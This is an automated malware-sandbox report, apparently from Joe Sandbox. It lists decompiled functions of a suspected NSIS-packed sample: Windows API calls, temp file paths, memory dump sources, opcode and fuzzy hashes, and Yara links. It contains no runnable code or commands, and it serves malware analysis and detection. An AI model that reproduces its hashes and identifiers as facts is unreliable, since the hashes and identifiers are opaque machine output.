                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                          • Part of subcall function 00405E5B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E71
                                                                                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                        • String ID: 9
                                                                                                        • API String ID: 163830602-2366072709
                                                                                                        • Opcode ID: c1a2398a3cf68ffccba9bba39206efc2048042628f08e4a72376123c44d13fd0
                                                                                                        • Instruction ID: 3d8386ac743f87b5a59d0c6af2c48158715b6bf8f4fdb2ba716f86882e7a1e00
                                                                                                        • Opcode Fuzzy Hash: c1a2398a3cf68ffccba9bba39206efc2048042628f08e4a72376123c44d13fd0
                                                                                                        • Instruction Fuzzy Hash: 46510A74D10219AEDF219F95DA88AAEB779FF04304F50443BE901F72D1D7B49982CB58
                                                                                                        Function 00404BB6 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BD1
                                                                                                        • GetMessagePos.USER32 ref: 00404BD9
                                                                                                        • ScreenToClient.USER32(?,?), ref: 00404BF3
                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C05
                                                                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C2B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Message$Send$ClientScreen
                                                                                                        • String ID: f
                                                                                                        • API String ID: 41195575-1993550816
                                                                                                        • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                        • Instruction ID: ae0188e128420319643ad50796f74bd77cac7447aa244d18a8bf097087cf05ab
                                                                                                        • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                        • Instruction Fuzzy Hash: 9C019E7190021CBAEB00DB94DD81BFFBBBCAF95711F10412BBB10B61D0C7B499418BA4
                                                                                                        Function 00401DB9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetDC.USER32(?), ref: 00401DBC
                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                        • CreateFontIndirectW.GDI32(0040CDA8), ref: 00401E3E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                        • String ID: Calibri
                                                                                                        • API String ID: 3808545654-1409258342
                                                                                                        • Opcode ID: 1acdf138dc74c3f4cbb002bee862ac271e9050b380170d6a443b5acebdec0054
                                                                                                        • Instruction ID: af8ff02f4bd052a881cb17574bfe8b5bbda2d2cac472569fbfdf17f98f113d3f
                                                                                                        • Opcode Fuzzy Hash: 1acdf138dc74c3f4cbb002bee862ac271e9050b380170d6a443b5acebdec0054
                                                                                                        • Instruction Fuzzy Hash: 39017571948240EFE7406BB4AF8ABD97FB49F95301F10457EE241B71E2CA7804459F2D
                                                                                                        Function 00402DF3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                        • MulDiv.KERNEL32(000D1CEE,00000064,000D1EF2), ref: 00402E3C
                                                                                                        • wsprintfW.USER32 ref: 00402E4C
                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                                                                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                                                                                        Strings
                                                                                                        • verifying installer: %d%%, xrefs: 00402E46
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                                                        • String ID: verifying installer: %d%%
                                                                                                        • API String ID: 1451636040-82062127
                                                                                                        • Opcode ID: 66d2592fca5784473147c8150b099ced33c2aea089bdfd78c1b867d04e1d1f0a
                                                                                                        • Instruction ID: 4bcbb139cde21edcf0ff7b700e9789e452b98774f77cb7efe3bd4e4e9d403b43
                                                                                                        • Opcode Fuzzy Hash: 66d2592fca5784473147c8150b099ced33c2aea089bdfd78c1b867d04e1d1f0a
                                                                                                        • Instruction Fuzzy Hash: C701F47154020CABDF209F60DE49FAA3B69EB44705F008439FA45B51E0DBB995558F98
                                                                                                        Function 004028AD Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                        • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 2667972263-0
                                                                                                        • Opcode ID: de92c1bd6f77b34e2ba4b4bc505dbe4f635d2773414333dd82a7c43b5c6c5a79
                                                                                                        • Instruction ID: 08f8d52deffd015bf7aba9006bc7b8b19cff7c85b8e7ef16137ebd65050c2e74
                                                                                                        • Opcode Fuzzy Hash: de92c1bd6f77b34e2ba4b4bc505dbe4f635d2773414333dd82a7c43b5c6c5a79
                                                                                                        • Instruction Fuzzy Hash: 1B218071C00528BBCF116FA5DE49D9E7E79EF08364F10023AF954762E1CB794D419B98
                                                                                                        Function 00404AA8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B49
                                                                                                        • wsprintfW.USER32 ref: 00404B52
                                                                                                        • SetDlgItemTextW.USER32(?,004236E8), ref: 00404B65
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                                                        • String ID: %u.%u%s%s$6B
                                                                                                        • API String ID: 3540041739-3884863406
                                                                                                        • Opcode ID: 45cae9be8c13eedb47404a8b3ee91442d476cfb775bff5969470e661b9022d33
                                                                                                        • Instruction ID: 22ef8b20c3cb34d9681d0f1950c5ee3b7e818b69147609aa9b6e87f13a537159
                                                                                                        • Opcode Fuzzy Hash: 45cae9be8c13eedb47404a8b3ee91442d476cfb775bff5969470e661b9022d33
                                                                                                        • Instruction Fuzzy Hash: 18110833A041283BDB10A96D9C46F9F329CDB85374F250237FA26F21D1DA79DC2182E8
                                                                                                        Function 00402598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\slgtsbog\oblating.ini,000000FF,nerveklinikkernes,00000400,?,?,00000021), ref: 004025E8
                                                                                                        • lstrlenA.KERNEL32(nerveklinikkernes,?,?,C:\Users\user~1\AppData\Local\Temp\slgtsbog\oblating.ini,000000FF,nerveklinikkernes,00000400,?,?,00000021), ref: 004025F3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWidelstrlen
                                                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\slgtsbog\oblating.ini$nerveklinikkernes
                                                                                                        • API String ID: 3109718747-606743028
                                                                                                        • Opcode ID: 117bdbcdfb20abded91d9bb1efc4a5bce906789812cb2159414a34963df76135
                                                                                                        • Instruction ID: 3dcd1766983357fa33eb9a2b17af164457a9c6038e68ae70dd04151361e6fae4
                                                                                                        • Opcode Fuzzy Hash: 117bdbcdfb20abded91d9bb1efc4a5bce906789812cb2159414a34963df76135
                                                                                                        • Instruction Fuzzy Hash: D7110872A00300BEDB146BB1CE89A9F76649F54389F20843BF502F61D1DAFC89425B6E
                                                                                                        Function 004057BB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 004057FE
                                                                                                        • GetLastError.KERNEL32 ref: 00405812
                                                                                                        • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405827
                                                                                                        • GetLastError.KERNEL32 ref: 00405831
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                        • String ID: C:\Users\user\Desktop
                                                                                                        • API String ID: 3449924974-3976562730
                                                                                                        • Opcode ID: 817c7eeb2e6ade2cce28f3b9d2e4670c9c7091e2f59c9eba6f9578a5288f1365
                                                                                                        • Instruction ID: fd95e7d74cf6809d4f8eb1fd1b0c41c525f08b7aa6685e2bd119da418b5cf1ce
                                                                                                        • Opcode Fuzzy Hash: 817c7eeb2e6ade2cce28f3b9d2e4670c9c7091e2f59c9eba6f9578a5288f1365
                                                                                                        • Instruction Fuzzy Hash: 61011A72D00219DADF009FA0CD447EFBBB4EF14305F00803AD944B6280DB789658CFA9
                                                                                                        Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                        • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                        • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                        • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                        • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 1849352358-0
                                                                                                        • Opcode ID: 46abf127b461966594539b2cb00e82417843b13178a7bdfc66a6853df7de0eec
                                                                                                        • Instruction ID: 40ca5798c6d3b59526a1ee34621216737133408fbccdd52925800404f238639f
                                                                                                        • Opcode Fuzzy Hash: 46abf127b461966594539b2cb00e82417843b13178a7bdfc66a6853df7de0eec
                                                                                                        • Instruction Fuzzy Hash: A3F0EC72A04518AFDB01DBE4DE88CEEB7BCEB48301B14047AF641F61A0CA749D519B78
                                                                                                        Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$Timeout
                                                                                                        • String ID: !
                                                                                                        • API String ID: 1777923405-2657877971
                                                                                                        • Opcode ID: 9583f5a57c3a775296e031cb14509230db2970ced6148bfab5cafbeadf370f61
                                                                                                        • Instruction ID: 994eb4c646dc30d4db2129160ed463076ae6c8af372a05c6722ea4476ca57ad0
                                                                                                        • Opcode Fuzzy Hash: 9583f5a57c3a775296e031cb14509230db2970ced6148bfab5cafbeadf370f61
                                                                                                        • Instruction Fuzzy Hash: 8E21C371948209AEEF049FB5DE4AABE7BB4EF84304F14443EF605B61D0D7B889409B28
                                                                                                        Function 00405B59 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00403346,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035A3,?,00000006,00000008,0000000A), ref: 00405B5F
                                                                                                        • CharPrevW.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,00403346,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035A3,?,00000006,00000008,0000000A), ref: 00405B69
                                                                                                        • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B7B
                                                                                                        Strings
                                                                                                        • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405B59
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CharPrevlstrcatlstrlen
                                                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                                                                        • API String ID: 2659869361-2382934351
                                                                                                        • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
